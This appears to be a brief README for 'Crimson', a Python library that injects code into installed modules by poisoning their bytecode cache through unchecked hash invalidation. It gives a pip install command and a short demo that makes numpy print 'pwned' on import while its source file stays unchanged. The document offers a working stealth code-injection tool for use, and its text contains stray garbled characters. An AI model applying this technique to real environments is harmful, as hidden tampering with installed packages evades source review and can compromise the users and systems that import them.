Crimson is a cache poisoning library which allows you to silently inject code into Python applications. This is achieved through unchecked hash invalidation.
pip聽install聽git+https://github.com/oelin/crimson
Crimson allows you to poison any Python module without altering its source code. For instance, the code below poisons numpy
so that it outputs pwned
when imported.
>>> import crimson
>>>聽crimson.invalidate("venv/lib/python3.9/site-packages/numpy/__init__.py",聽"print('pwned')")
>>>聽import聽numpy
"pwned"